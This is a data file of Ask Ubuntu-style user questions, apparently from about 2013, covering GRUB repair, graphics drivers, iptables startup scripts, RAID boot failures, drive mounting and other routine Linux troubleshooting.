linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:40 remove linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 < none > 2013-03-26 14:20:40 status half-installed linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 status config-files linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 purge linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 < none > 2013-03-26 14:20:46 status config-files linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 status config-files linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 status config-files linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 status config-files linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 status config-files linux-image-extra-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 status not-installed linux-image-extra-3.5.0-26-generic : amd64 < none > 2013-03-26 14:20:46 status half-configured linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:46 remove linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 < none > 2013-03-26 14:20:46 status half-configured linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:47 status half-installed linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 status config-files linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 purge linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 < none > 2013-03-26 14:20:51 status config-files linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 status config-files linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 status config-files linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 status config-files linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 status config-files linux-image-3.5.0-26-generic : amd64 3.5.0-26.42 2013-03-26 14:20:51 status not-installed linux-image-3.5.0-26-generic : amd64 < none > so i 've refined my question somewhat - what are the implications of freezing my current installation at 3.5.0-24-generic ?
270671	make kile default for tex files	i re-installed ubuntu due to some issues but before the re-install , i was able to make my default tex editor by going into properties , other apps , and selecting kile . now kile is n't an option to select . what can i do ?
270674	restoring grub without live session	i am looking for a way to restore grub without using any live session . i am trying to do it using unetbootin . after successful unetbootin installation , on reboot , it takes me to a menu to select between windows or unetbootin . selecting unetbootin takes me to a command line interface . grub > but , i am supposed to get a menu selection interface . question is what commands should i follow to restore my grub from command line ? solution i used easybcd to chain load from windows to grub . then i used boot repair to restore grub . after that i had to go back in windows and undo the changes made by easybcd . ( thanks @ eliahkagan )
270677	problems with video card	my notebook is hp probook 4530s-lh306ea . i have two video cards discrete ( amd radeon hd 6490m ) and integrated . today i have installed ubuntu 12.10 , and meet the problem that my computer become very hot ( jupiter shows from 75-85 degrees ) . i have understand that the problem in video card , so i have tried to switch off discrete using https : //help.ubuntu.com/community/hybridgraphics but i do n't know how to switch it forever , because after computer restarts discrete is switched on . and i can not understand why there is so big problem with this video cards ? on windows exists program , that knows which of this two video cards to use . ps i have missed step with backup and start installing , but then occure error : `` one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . see /usr/share/ati/fglrx-install.log for more details '' in log file is written : `` check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.5.0-17-generic/build/include/linux/version.h can not be found on this system . '' pss i have run with -- force option and get : supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.5.0-17-generic/build/include/linux/version.h can not be found on this system . fglrx installation is being forced . installation will proceed without the required tools on the system . uninstalling any previously installed drivers . unloading radeon module ... error : module radeon is in use unloading drm module ... error : module drm is in use by radeon , i915 , ttm , drm_kms_helper [ message ] kernel module : trying to install a precompiled kernel module . [ message ] kernel module : precompiled kernel module version mismatched . [ error ] kernel module : kernel module build environment not found - please consult readme . [ reboot ] kernel module : update-initramfs
270678	whether to wait for my phone model ubuntu touch and developed it at all ?	i 'm from russia , and i write through a translator . i would like to know whether the available os ubuntu touch on xperia phones in 2012 , ie xperia ion ? i really like this system , and wanted to try it on my phone . i 'd buy the nexus , but i do it for personal reasons , do not like . thank you . daniil makarov , russia
270683	why does roboto regular display as bold ?	i downloaded the roboto font from the android website . all the weightsâincluding roboto regularâdisplay properly in the font viewer , but when i try to set it as my title bar font ( with gnome-tweak-tool ) or use it in an application , roboto regular always displays as roboto bold . as far as i can tell , this only seems to affect roboto . i am on ubuntu 12.10 now ( with unity replaced with gnome 3 if that matters ) . i never checked in 12.04 , but i know i did not have this problem in 11.04 .
270687	php repository without suhosin	i do n't really know how to or want to compile php from source , but i need php without suhosin . as you may know the main repository comes with suhosin patch . this is causing errors on my website and i need it gone . the attempts to disable built-in suhosin failed and the only reliable option i have is to install php from source . is there a repository that comes with php5 but without built-in suhosin patch , so i can just install php through apt-get and be done ? thanks .
270690	how to use default lxde theme instead of lubuntu-theme ?	i have install lubuntu 12.10 . i really did n't like the lubuntu-theme . its very confusing to distinguish whats there on task bar . therefore , i wanted the theme like fedora lxde or default-lxde theme . please provide me the step to install/use default-lxde theme , as it is dark and edgy .
270693	how can set these iptables rules to run at startup	i usually run my iptables rules whenever i login . from the terminal i type ; sudo sh firewall.sh setting up my sister 's computer , i want to give her some basic firewall protection . she wont be logging in as admin , just a standard account . how can i make a firewall script run everytime she logs in without her having to type in any password ? the script i wrote for my sister 's computer contains ; # ! /bin/sh modprobe ip_conntrack iptables -f iptables -x iptables -p input drop iptables -p output drop iptables -p forward drop iptables -i output -p tcp -- dport 80 -- sport 32768:61000 -j accept iptables -i output -p udp -- dport 53 -- sport 32768:61000 -j accept iptables -i output -p tcp -- dport 443 -- sport 32768:61000 -j accept iptables -a output -o lo -j accept iptables -i output -p icmp -j drop iptables -i input -p icmp -j drop iptables -i input -p udp -j drop iptables -i input -p tcp -m tcp -- syn -j drop iptables -i input -i lo -j accept iptables -i input -m conntrack -- ctstate established , related -j accept i 've placed it in her home folder as firewall.sh and set it to be executable ( right click on the file , and checking the `` allow executing file as program '' option in the permissions tab ) . running this script from the terminal as root works fine . after typing ; sudo sh firewall.sh i typed into the terminal sudo iptables -l -v and i get chain input ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 accept all -- any any anywhere anywhere ctstate related , established 0 0 accept all -- lo any anywhere anywhere 0 0 drop tcp -- any any anywhere anywhere tcpflags : fin , syn , rst , ack/syn 0 0 drop udp -- any any anywhere anywhere 0 0 drop icmp -- any any anywhere anywhere chain forward ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 drop icmp -- any any anywhere anywhere 0 0 accept tcp -- any any anywhere anywhere tcp spts:32768:61000 dpt : https 0 0 accept udp -- any any anywhere anywhere udp spts:32768:61000 dpt : domain 0 0 accept tcp -- any any anywhere anywhere tcp spts:32768:61000 dpt : http 0 0 accept all -- any lo anywhere anywhere how can i have this this script run automatically at login , or possibly save these rules permanently for my sisters computer ? could you please provide some detailed code , as my first attempts at rc.local method and iptables-save have not been very successful . on every reboot , all input , output and forward chains are reset to accept , with no policies listed when i type sudo iptables -l -v
270694	no root directory error while installing 12.04	while installing ubuntu 10.04 over windows 7 i 'm getting `` no root directory found '' when i 'm installing through the image . while installing through cd the system is not detecting the installed operating system and my whole hdd ( 500gb ) is shown as a single one . no partition is shown .
270698	wubi install no longer boots	i dual-boot windows 8 and ubuntu 12.10 with wubi . i use two partition on the same hdd . my ubuntu partition was starting to run low on memory , so i added 10 gb to it . now it wo n't boot into ubuntu , it says : error no such device : 7802edf027ea234 . i restarted my computer and selected `` advanced boot options '' , and then recovery mode . a bunch of text came on my screen , and the message : alert ! /dev/disk/by-uuid/7802edf027ea234 does not exist dropping to a shell ! ( ash ) so , boot-repair gave me the link paste.ubuntu.com/5632890 any and all help appreciated , thanks guys ! -kind regards
270699	no additional driver listed	i ca n't find any additional driver listed in my ubuntu 12.10 . i 've checked the following command and it shows like i 've got nvidia card for sure . i 've got nvidia geforce gt520m . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0ded ( rev ff ) so can you please help me to get my nvidia driver to work out ? i 'm quite confused that everybody can see additional driver for their nvidia cards . is it only me who ca n't see the additional drivers for nvidia card ? please help me . and i ca n't post my screenshots as i 've not enough reputations . : (
270706	no sound on ubuntu 10.04	i have windows7 and ubuntu-10.04 in my laptop ( lenovo z580 modle ) . i have proper sound in windows by not in ubuntu . there is no sound while ubuntu boot . i tried this command : sudo aplay -l output : aplay : device_list:223 : no soundcards found ... i tried another command : lspci -v | grep -a7 -i `` audio '' output : 00:1b.0 audio device : intel corporation device 1e20 ( rev 04 ) subsystem : lenovo device 3977 flags : bus master , fast devsel , latency 0 , irq 10 memory at f3a10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > 00:1c.0 pci bridge : intel corporation device 1e10 ( rev c4 ) flags : bus master , fast devsel , latency 0** any suggestions on how to fix this ?
270708	copy app to rackspace from different network	i want to copy files from my system to rackspace ( aws ) , ( there is a way to use scp but i am in my office network , rackspace bought at aws ) , any package is there ? for this need . help me to copy my app to rackspace..
270710	how to open terminal with last tabs open ?	when you are using terminal in mac there is option to open last opened tabs when you launch terminal . is there an option available on ubnutu 's ( 12.10 ) terminal ? this is helpful when you have lot of tabs open and want each tab back with some history and some specific directories .
270711	how can i change the default color for all the text in the system manually	how can i change the overall default color for text of the whole system , be it for the gnome panel , tty , shell , etc.in all the just look and feel aspect of my system .
270713	is there a fix for md raid failure on 12.04	i 've got a system that ran cleanly on ubuntu 10.04 lts . upgrading to 12.04 lts / 12.04.1 lts / 12.04.2 lts has been unpleasant and unsuccessful . install goes cleanly and i have installed as follows : / on lvm lv backed by by mdadm raid 1 pair /dev/md0 ( /dev/sda1 , /dev/sdb1 ) ext4 0.90 metadata /boot on lvm lv backed by mdadm raid 1 pair /dev/md1 ( /dev/sda2 , /dev/sdb2 ) ext4 0.90 metadata swap on lvm lv backed by mdadm raid 1 pair /dev/md2 ( /dev/sda3 , /dev/sdb3 ) swap 0.90 metadata /data on lvm lv backed by mdadm raid 5 set /dev/md3 ( /dev/sd [ cdefghijkl ] 1 ) xfs 1.2 metadata after install i boot for the first time from the system . i get the grub2 menu and can pick either normal or recovery mode and the behaviour is the same : it seems that my second disk controller is slow to start up and/or mdadm takes a bit longer to assemble /dev/md3 and this is detected as a failure . even though i ( try to ) respond affirmatively to the 'start degraded array ' prompt , i always land in the busybox prompt . if i start in recovery mode i see /dev/md3 boot up completely after the system has moved past the 'start degraded array ' prompt . i see that there are issues with 12.04 , one post captioned this way : danger - do not use ubuntu 12.04 if you have any software raid ubuntuforums.org post 1983352 ubuntu bug 872220 is the problem solved in 12.10 , or are there other workarounds available ? thanks for any suggestions ... brad
270718	is it possible to launch an application in a language other than the system language ?	i want to launch geany in a language other than the system default english . how can i do that ?
270720	`` could not import runpy module '' when running apt-get on xubuntu 12.10	just installed xubuntu 12.10 , on first apt-get update and upgrade i got '' could not import runpy module '' and all installs seem to stop there . e.g . `` sudo apt-get -- reinstall install python '' gives the following ... running python rtupdate hooks for python3.2 ... could not import runpy module traceback ( most recent call last ) : file `` /usr/bin/py3compile '' , line 289 , in main ( ) file `` /usr/bin/py3compile '' , line 283 , in main process.communicate ( ) file `` /usr/lib/python3.2/subprocess.py '' , line 809 , in communicate self.stdin.close ( ) ioerror : [ errno 32 ] broken pipe error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/init.py '' , line 4 , in from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 12 , in import subprocess , tempfile , os.path , re , pwd , grp , os eoferror : eof read where not expected ... dpkg : error processing python3-aptdaemon.pkcompat ( -- configure ) : dependency problems - leaving unconfigured setting up python ( 2.7.3-0ubuntu7 ) ... errors were encountered while processing : python3 python3-dbus python3-distupgrade python3-update-manager python3-gi ufw python3-problem-report python3-apport python3-aptdaemon python3-aptdaemon.gtk3widgets python3-aptdaemon.pkcompat e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ... all help in solving this is very much appreciated : ) matti
270727	is there a proper way to set up a copy-on-write based build env that use your live / as base files ?	i 'm trying to set up a build environment using chroot , but instead of downloading ubuntu base files , i want to use my live / as base files for the chroot and use c-o-w to redirect any changes made in the chroot to other folder . so i come up with these sudo mkdir /var/chroot/build/ { root , cow , ubuntu } sudo mount -- bind / /var/chroot/build/root sudo mount -- bind /proc /var/chroot/build/root/proc sudo mount -- bind /dev/pts /var/chroot/build/root/dev/pts sudo mount -t overlayfs -o upperdir=/var/chroot/build/cow , lowerdir=/var/chroot/build/root overlayfs /var/chroot/build/ubuntu sudo chroot /var/chroot/build/ubuntu it works almost perfectly except that contents of both /proc and /dev/pts are not visible inside the chroot although they are visible outside the chroot . im guessing that 's the limition of overlayfs when you set up chroot this way so i want to know is there a proper way to do this ? i found a nice sandbox app called arkose which does almost what i want to do here but it does n't let you keep the changes , once you exit the chroot , all files in c-o-w dir will be wiped out , which is not what i want
270730	cant run apps fullscreen with wine	i am running ubuntu 12.10 and when i am using wine 15. something then when i try to run world of warcraft on fullscreen , then the unity sidebar remains there . when i run league of legends , then it is not there . maybe it is fault of wow not wine , but please try to help me somehow . and i have also checked unredirect fullscreen windows on compizconfig settings manager .
270733	i ca n't log in into my pc , shows grub rescue instead	i have windows 7 , windows8 , and ubuntu installed . now , when i turn on my pc , it does n't start and it shows `` grub rescue '' . all that i could find is my linux partition where i can find the boot files is ( hd0 , msdos5 ) and that my kernel is vmlinuz-3.5.0-17-generic . i hope that you can help me .
270735	simply safe internet access	is it necessary to configure a firewall like iptables or firestarter when the goal is only to surf safely ? for me , there is no need to open any port ( i.e . samba , etc . ) .
270741	ca n't run perl-browser	i 'm trying to run this program perl-browser but i 'm getting fowllowing error : $ perl ./perl-browser ca n't locate gtk2/webkit.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl . ) at ./perl-browser line 8 . begin failed -- compilation aborted at ./perl-browser line 8 . why is that ?
270742	kernel panic error : attempted to kill 'init '	after making a update on my toshiba satellite l300d laptop i started getting this error message : kernel panic - not syncing : attempted to kill init ! exitcode =0x00000007 i am currently running ubuntu 12.10 . i have attempted reinstalling the os without deleting any of the stuff on my laptop but it keeps coming up with an error halfway through .
270743	strange firefox problems when started by xinit	when i start firefox console via : xinit /usr/bin/firefox firefox is not working properly : html select elements does not work ( unable to change default value ) after opening local pages ( i.e . http : //localhost:8888 ) i am unable to change active console ( i.e . ctrl + alt + f2 ) . i have to quit ( ctrl + q ) and then changing console works . firefox menu does not work . it is visible but when i click on it does not show submenu . firefox works well when run with openbox : openbox & firefox it is nice that i can change window location and size , but i do n't wa n't people have access to openbox menu and i think firefox should work alone ( ? ! ) any suggestions ?
270744	how to pause a running aria download	when downloading big files it necessary to pause the download many times . a big file can be downloaded by using wget . first start download , then kill wget , then resume download by wget -c. i want to pause downloads too many times depending on events such as power failure , network unavailability , etc ... and want to automate it using a script . so pressing ctrl+c is't an option . i know a process can be paused by kill -stop `` $ pid '' the pausing should not close the connection to the website , either it should wait for resume command or the bandwidth throttled to very low use . i found these commands using aria2c in aria2.sourceforge.net , but i ca n't use it successfully . this uses rpc method . can i use it in a script ? aria2.pause ( gid ) this method pauses the download denoted by gid . gid is of type string . the status of paused download becomes paused . if the download is active , the download is placed on the first position of waiting queue . as long as the status is paused , the download is not started . to change status to waiting , use aria2.unpause ( ) method . this method returns gid of paused download . aria2.unpause ( gid ) this method changes the status of the download denoted by gid from paused to waiting . this makes the download eligible to restart . gid is of type string . this method returns gid of unpaused download . question how to pause ( or throttle bandwidth ) an already running download of aria is there a better down loader than aria to use in script wether rpc method can be used in script
270746	how can gain root access whilst logged into a normal account ?	i 've set up an ubuntu computer for my sisters . there is the admin account which only i can access and there are two normal accounts . occasionally i 'm going to be called upon to install an extra program , check a setting or fix a problem . instead of logging out and then logging into the admin account , it would be much easier if i could fix the problem from the terminal when i am handed the computer . for example , i wanted to check the iptables policies whilst logged into the normal account . when i typed in sudo iptables -l -v i was not able to access that command since the normal user account i was logged in did not have privileges , and it gave a message saying that the incident would be reported . i logged back into the admin account , and added the user to the sudo group . when testing the iptables command again when logged in as the normal account , it only requested the normal user 's password . i do not want this . for security measures , i would prefer that only the root password be used to execute these commands , especially when logged into the normal user account . how can i execute commands requiring root privileges whilst logged into a non-admin account , and ensuring that only the root password can be used to execute those commands ?
270750	deja dup restore error help please	i 'm running ubuntu 12.10 intel i5 8gb 1tb gigabyte mb i have backed up all my data ( home folder only ) to an external hdd . today , after a fresh os install with the same version of ubuntu , i ca n't restore my data . the following error comes up every time i have also tried command line : duplicity -- gio file : ///media/backup /tmp/restore same error raceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1412 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1405 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1339 , in main restore ( col_stats ) file `` /usr/bin/duplicity '' , line 630 , in restore restore_get_patched_rop_iter ( col_stats ) ) : file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 522 , in write_ropaths for ropath in rop_iter : file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 495 , in integrate_patch_iters final_ropath = patch_seq2ropath ( normalize_ps ( patch_seq ) ) file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 462 , in patch_seq2ropath assert first.difftype ! = `` diff '' , patch_seq assertionerror : [ ( ( 'home ' , 'harry ' , '.apport-ignore.xml ' ) reg ) ] please help .
270753	how to delete nomodeset from my grub file in order to boot normally ?	how can i delete the option nomodeset in /etc/default/grub ? or , more precisely , how can i access a command line in order to delete the option ? i have set it in my grub file trying to debug this bug . now i can not longer access the ubuntu recovery mode in order to delete the nomodeset from the grub file . i do not know how to get access to a command line without access to the recovery mode . ctrl + alt + f1 or f7 does not work . the last messages i get are starting lightdm display manager and stopping save kernel messages so i think the system does start fine . is there a way ( keyboard shortcut ) to boot into a terminal for instance ?
270759	launch program in screen after reboot	i am running several headless ubuntu 12.04 boxes . my typical usage involves logging into each machine via a putty session and executing a script using screen . after logging in via putty , i execute the following from the command line : screen /home/user/ '' script '' my question is : is there any way to get my script/program to run automatically after a reboot ? i 'm trying to prevent a loss of productivity in a power loss/automatic reboot situation .
270772	ubuntu 11.10 /var/log/auth.log	i use ubuntu 11.10 . and i want it to write logging messages about failed ssh log in attempts to /var/log/auth.log . in my understanding /var/log/auth.log is supposed to hold all failed ssh connection attempts . how am i supposed to do ? ( what do i need to check ? how can i configure my machine ? ) : ~ $ sudo ls -al /var/log/auth.log -rw-r -- -- - 1 syslog adm 0 2011-09-11 06:25 /var/log/auth.log : ~ $ sudo ls -al /var/log/wtmp -rw-rw-r -- 1 root utmp 15744 2013-03-21 18:09 /var/log/wtmp currently /var/log/wtmp is handled very well as you could find it above . but /var/log/auth.log is empty . i 'd like my machine handle /var/log/auth.log as it is supposed to be . thank you in advance .
270775	cli mounting vs. gui mounting	on ubuntu 12.10 , when i want to mount a hard drive , i can just click on the unmounted drive and everything works fine ( by mounting to /media/username/partitionlabel ) . basically , i would like to do exactly that via command line ( for a script i 'm working on ) . since i do not want to automount on boot , fstab is out of the question ( right ? ) . when i use mount on cli , i need to specify a mountpoint ( which needs to have a previously created mountpoint ; also , i need to take care of permissions and whatnot ) -- what i do n't understand is where does the gui take all its infos from ? the mountpoint seems to depend on the partition 's label , but such a directory does n't exist before mounting . also , the gui way does n't seem to care too much about a user not being root . is there an `` easy '' way to mount via cli , just like it does on the gui by clicking on an unmounted drive ?
270785	your system running in low graphics mode	i have laptop dell inspiron 5520 i have ubuntu 12.10 on it sometimes when i open ubuntu a message appear '' your system running in low graphics mode `` please told me what should i do
270790	xubuntu - how to disable shift toggles numpad keys ?	by default in ubuntu i can perform shift+home to select content from caret to start of string , while numlock is turned off . but if in that case i press just home , it will type 1 instead of moving caret to start of string , and this is expected behavior considering that numlock is off . to use home i will need to turn on numlock . so - how can i change it to microsoft-defaults , when perform shift+home and home doesnt need changing state of numlock ? ive already discovered this q : xubuntu : make shift+numpad work like windows but it does not help . my /etc/default/keyboard file looks now : # check /usr/share/doc/keyboard-configuration/readme.debian for # documentation on what to do after having modified this file . # the following variables describe your keyboard and can have the same # values as the xkbmodel , xkblayout , xkbvariant and xkboptions options # in /etc/x11/xorg.conf . xkbmodel= '' pc105 '' xkblayout= '' us '' xkbvariant= '' '' xkboptions= '' numpad : microsoft '' # if you do n't want to use the xkb layout on the console , you can # specify an alternative keymap . make sure it will be accessible # before /usr is mounted . # kmap=/etc/console-setup/defkeymap.kmap.gz upd also i found that on login screen home/shift+home works properly !
270795	ca n't find/remove online account from evolution	i have two accounts set up in evolution that i 'm not able to remove nor from evolution itself neither from the online account panel . in evolution the `` delete '' button is disabled when i select those two accounts in online accounts they are not present in the list so i can not remove them . the accounts i wish to remove are the ones with the half-globe icon
270801	ubuntu 12.04 : amd a8-5500 ( with radeon hd 7560d ) and console mode problem	i 'm experiencing problems using amd trinity hardware in ubuntu 12.04 during boot . i installed 'fglrx ' driver and rebooted . system hung . i purged driver . i installed 'fglrx-experimental ' and rebooted . system booted ok except the text mode was weird showing text lines as white uneven stripes . i purged driver . i downloaded the latest proprietary amd driver `` source '' , created ubuntu/precise deb-package , installed it , and rebooted . the result was mainly as if i installed 'fglrx-experimental ' . than i added 'nomodeset radeon.modeset=0 ' to grub kernel line , updated the grub , and rebooted . the result did not change . some more different attempts gave no improvement . i 'd be very grateful for any suggestion on how to fix the text mode behavior . thanks ! ( i did not find any effective solution yet having been exploring the inet for several days . ) -- +bw , tvt
270803	where can i find word games and puzzles ?	where can i find downloadable word games for ubuntu ?
270804	how to fully upgrade to kubuntu 12.10 from ubuntu 12.04 ?	i have customized ubnutu but i want to upgrade to kubuntu and save only some programs and configs
270807	how to uninstall unused window managers and related packages ?	i have uninstalled most unused session managers , but there are a few that still show among the options at login . the full list is : gnome classic gnome classic ( no effects ) [ keep ! ] gnome/openbox openbox [ keep ! ] ubuntu ubuntu 2d if , as indicated above , i want to keep only `` gnome classic ( no effects ) '' and `` openbox '' , what installed packages can i remove with apt-get ? also , supposing that removing those packages does not yet eliminate all the unwanted options from the list above ( e.g . maybe they are included in the same debian package that includes one of the wanted options ) , is there a way to at least remove them from the options list ? lastly , i see , from , for example , dpkg-show -l | grep ii | grep -i xfce , that i may still have remnants lying around from formerly installed session managers , even though they no longer show up among the options at login . ( they persist , btw , even after sudo apt-get -y autoremove . ) how can i find what all those remaining packages are so that i can delete them ? edit : whatever you do , do not run sudo apt-get remove unity* , or anything similar . if you want to uninstall unity , see here .
270808	unable to record videos in webm format with any screen recording software on ubuntu 12.04 lts	im unable to record videos in webm format with any screen recording software on ubuntu 12.04 lts . i have tried using kazam , tibesti , eidete etc . all of them failed to record webm videos . do you have any idea what might be the problem ? i can play webm videos though . i was not aware before today that i can not record webm videos . today i have installed a new screen recording software called `` eidete '' which only records in webm . after installing that and messing with various settings i finally find out the problem is with webm format . any help is greately appriciated . i have made a post on how i have installed `` eidete '' screen-casting tool on ubuntu 12.04 x86 . the link is here : http : //www.cappredia.blogspot.in/
270809	how to select mount points for windows partitions ?	can someone give me some criterias on how to select mounting points for ubuntu installation ? at the moment windows 7 is my main os on the pc and the 250gb hdd memory is allocated this way : c : / -win7 os d : / -everything else ( games , music , photos etc ) other partition ext4 -ubuntu 12.04 lts and now i want to make ubuntu as my primary os but i do n't know how to proper select mounting points to use it to my advantage . example : 1st partition ext4 for ubuntu- that will be set on `/` 2nd partition ext4 for games , photos 3rd partition ntfs for windows 7 4th partition ntfs for windows games . so where to set my 2nd partition 's mounting point to save my other things ? /home or something else ?
270811	mount a win8 phone as share on ubuntu 12.10	i 'm trying to mount a nokia 620 phone running win8 on my ubuntu 12.10 box . i can see the device using lsusb , but from what i can see it 's not listed under sudo blkid . i 'm trying to follow the instructions here : https : //help.ubuntu.com/community/mount/usb has anyone done this successfully ? just for clarity , i want to be able to copy files from my computer onto the phone . i 've tried using a win8 image on virtualbox - no luck . i have all usb devices enabled for the virtual machine .
270813	can not boot laptop after i dropped it	i dropped my laptop ( from a chair ! ) and now it does not boot . it shows me only the grub menu screen . using the recovery mode it gave me : no init found.try passing init=bootarg and prompted ( initramsfs ) then , i used a live cd and did : sudo fdisk -l device boot start end blocks id system /dev/sda1 * 2048 292863 145408 83 linux /dev/sda2 294910 95995903 47850497 5 extended /dev/sda3 95995904 312580095 108292096 83 linux /dev/sda5 88184832 95995903 3905536 82 linux swap / solaris /dev/sda6 294912 23730175 11717632 83 linux /dev/sda7 23732224 88178687 32223232 83 linux i did : sudo fsck /dev/ for all the devices . all were fine except from /dev/sda2 which gives : fsck.ext2 : attempt to read block from filesystem resulted in short read while trying to open /dev/sda2 /dev/sda5 : fsck : fsck.swap : not found fsck : error 2 while executing fsck.swap for /dev/sda5 and /dev/sda6 : /dev/sda6 contains a file system with errors , check forced . pass 1 : checking inodes , blocks , and sizes error reading block 659 ( attempt to read block from filesystem resulted in short read ) . ignore error < y > ? no error while iterating over blocks in inode 7 : attempt to read block from filesystem resulted in short read e2fsck : aborted ( i do n't know what to answer at `` ignore error '' ) after that , i rebooted and chose recovery from the menu grub . now , it gave me no longer the `` no init found '' , it showed me a ncurses menu where i did system check and grub ( these options ) . the system check gave me : /dev/sda6 : unexpected inconsistency run fsck manually error reading block 659 /dev/sda6 contains a file system with errors mountall : the system file contains errors mountall : ignoring plymouth not available ( sth like that ) fsck [ 866 ] terminating with condition 4 what can i do ?
270814	fn function on das keyboard model s does n't work	i tried to test fn with xev â pressing it or any combination like fn + f1 for mute does n't show anything in output . what can i do ?
270816	xubuntu title bar missing	i am using xfce4.10 on ubuntu 12.04 . when i installed xubuntu-desktop and logged into xubuntu session . the title bars were missing with only the minimize , maximize and close buttons visible . can someone help on solving this problem ... . !
270820	how to determine if a package is safe to uninstall ?	i know that there are many recipes/strategies for getting a `` minimal ubuntu '' , but they are too extreme for what i 'm trying to do . still , i suspect that i have a ton of packages installed that i do n't need , either directly or indirectly . how can i go about finding out what i can delete ? at minimum i need to figure out , for every installed package , whether it is needed by any `` application '' i normally use . ( of course , there are `` applications '' that i use normally without being aware of it , so this is easier said than done . )
270832	how do i install an app on a device running ubuntu touch ?	i 've built the sample app for ubuntu touch and i 've got a device running the preview . so how do i put the app on the device ?
270836	pencil export page as png does not work	i was trying to use the latest pencil ( version 2.0.3 ) in ubuntu 12.04 , but the png exporting does not work , with pencil working both inside and outside firefox ( which is 19.0.2 ) . the export page as png dialog asks for where to put the file but fails silently after that , and the export document using any html template gets you this dialog stalled forever : how can i fix it ?
270839	/usr/share/apport/apport-gpu-error-intel.py error	i was on ubuntu 12.10 and ran the system updates and after the re-install , the system became unstable and kept prompting me with the message `` system issue '' and this as the error per ubuntu `` /usr/share/apport/apport-gpu-error-intel.py '' . after i tried re-starting , the issue is still appearing and the system ultimately freezes ( requiring a hard reset ) . i tried a clean install of 12.10 and the system works fine until the newest updates are applied ... it then returns to the same messages . i then tried a clean install of 12.04 lts and just like 12.10 it works until the latest updates are applied . on 12.04 , i tried to use the previous kernel - going from 3.5.0-26 to 3.5.0-23 and the issue is still there . currently , i 'm sitting on 12.04 lts clean install without doing the updates and the system is working . does anyone have an idea how to fix this ? thanks .
270843	dm-crypt with luks - aes kernel module	ubuntu documentation says that an aes kernel module needs to be enabled for using aes and dm-crypt with luks but when i run modprobe aes as the documentation says to , i get error : could not insert 'padlock_aes ' : no such device . the documentation considers this error saying that it can be a sign that my system `` does not have a hardware cryptographic device . '' but i have a modern i7 cpu and grep aes /proc/cpuinfo reveals the aes flag . if i ignore the kernel module command and continue along with cryptsetup everything seems to work correctly . this is even with ignoring the ubuntu documentation 's remedy for the error of alias aes aes_generic . in comparison . the arch linux guide on performing the same task does not include the kernel module loading step ( see under the heading `` formatting luks partitions '' ) . given that cryptsetup works even if i throw the ubuntu documentation 's advice to the wind and that the arch guide does n't even mention what the ubuntu documentation did i am getting the feeling that perhaps the aes module is preloaded in newer kernels perhaps ? i expect that i will have hardware level aes support with the hardware that i own .
270844	issue with multiple dvd writers in ubuntu 12.10	i have an issue with dvd drives . i 've installed more than 2 dvd drives on the pc , but i am unable to mounting those drive .
270845	ubuntu server roaming profile for xp pro	i'am new to ubuntu or linux server os . what i want to accomplish is to have an ubuntu 12 server running for my workplace . we currently have atleast ten employees and i want them to have their own roaming profile , their own shared folders which is accessable by the administrator and my manager . my workstations are all running windows xp pro , and you could include a setup for mandatory type of profile that would be great . //summary of all the setups ubuntu as a pdc . use roaming profile for 10 employees each has their own shared folder that is accessable by authenticated user and of course the manager .
